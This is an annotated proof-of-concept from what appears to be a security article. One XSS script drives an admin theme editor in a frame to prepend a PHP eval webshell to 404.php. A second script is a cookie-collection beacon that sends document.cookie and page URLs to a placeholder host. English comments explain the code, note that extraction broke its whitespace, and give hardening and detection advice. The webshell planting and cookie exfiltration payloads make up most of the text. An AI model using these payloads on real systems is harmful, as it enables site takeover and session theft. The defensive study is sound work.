// Proof-of-concept from the article: script that runs inside a page which
// frames another page in an <iframe id="testxss">.
//
// What the visible code does:
//   - `times` caps the routine at 11 runs (the body executes while times <= 10).
//   - It reads the framed document directly through contentWindow.document,
//     which the browser only permits when the frame is same-origin with the
//     script. Presumably the framed page is the admin theme-file editor and the
//     script is delivered by an XSS in an administrator's session; the framed
//     page is not shown here, so confirm against the full article.
//   - It prepends a PHP one-liner (eval of the POST parameter `cmd`) to the
//     text of the element with id "content", then clicks the second <button>
//     in the frame (btn[1]), i.e. it submits the edited content.
//   - `g_shell` is never set to 1 anywhere in this excerpt, so the GET to
//     /usr/themes/default/404.php?shell=1 is not reached from the code shown.
//   - `olddatas` is assigned without a declaration (implicit global).
//
// NOTE(review): whitespace was lost in extraction (`functionpoc`,
// `newXMLHttpRequest`, `return0`), so the line below does not parse as printed.
//
// Defender notes:
//   - Keep theme directories non-writable for the web server account, or
//     disable in-panel file editing, so a hijacked admin session cannot alter
//     PHP files.
//   - Serve admin pages with `Content-Security-Policy: frame-ancestors 'none'`
//     (or `X-Frame-Options: DENY`) so they cannot be driven from a frame.
//   - Detection: file-integrity monitoring on theme *.php files, searching them
//     for `eval($_POST`, and web-log review for requests to theme files that
//     carry a `shell=1` query or a POST body.
var times=0; var g_shell=0; functionpoc() { if (times <= 10) { var htmldata = document.getElementById("testxss").contentWindow.document.getElementById("content"); var btn = document.getElementById("testxss").contentWindow.document.getElementsByTagName("button"); olddatas = htmldata.innerText; htmldata.innerText = "<?php @eval($_POST[cmd])?>\n" + olddatas; btn[1].click(); times += 1; if (g_shell == 1) { var xhr1 = newXMLHttpRequest(); xhr1.open("get", "/usr/themes/default/404.php?shell=1"); xhr1.send(); } else { return0; } } }
// step1 is not defined in this excerpt; it presumably sets up the iframe and
// schedules the routine above. Confirm against the full listing.
step1();
访问发现一句话木马已经被写入 404.php 文件
获取 Cookie 脚本
// Cookie-collection beacon from the article.
//
// What the visible code does:
//   - `website` is the collection endpoint (the host is a placeholder as
//     printed on the page).
//   - An immediately-invoked function creates an Image and sets its src to
//     `website` plus a query string, which makes the browser send one GET
//     request carrying these values in the URL:
//       keepsession=1  fixed marker
//       location       document.location.href
//       toplocation    top.location.href
//       cookie         document.cookie
//       opener         window.opener.location.href, when it is readable
//   - Each value is read inside its own try/catch that yields '' on error, so a
//     cross-origin access failure does not stop the request. Values are encoded
//     with the legacy escape() function.
//
// NOTE(review): whitespace was lost in extraction (`newImage`,
// `returndocument`), so the line below does not parse as printed.
//
// Defender notes:
//   - document.cookie only exposes cookies set without the HttpOnly attribute;
//     marking session cookies HttpOnly keeps them out of this read.
//   - A Content-Security-Policy with a restrictive `img-src` stops the browser
//     from loading an image from an unlisted host, which blocks this channel.
//   - Detection: proxy or egress logs showing GET requests whose query string
//     contains `keepsession=1` together with `cookie=` and `location=`.
var website="http://xss.xxx.com"; (function(){(newImage()).src=website+'/?keepsession=1&location='+escape((function(){try{returndocument.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{returndocument.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();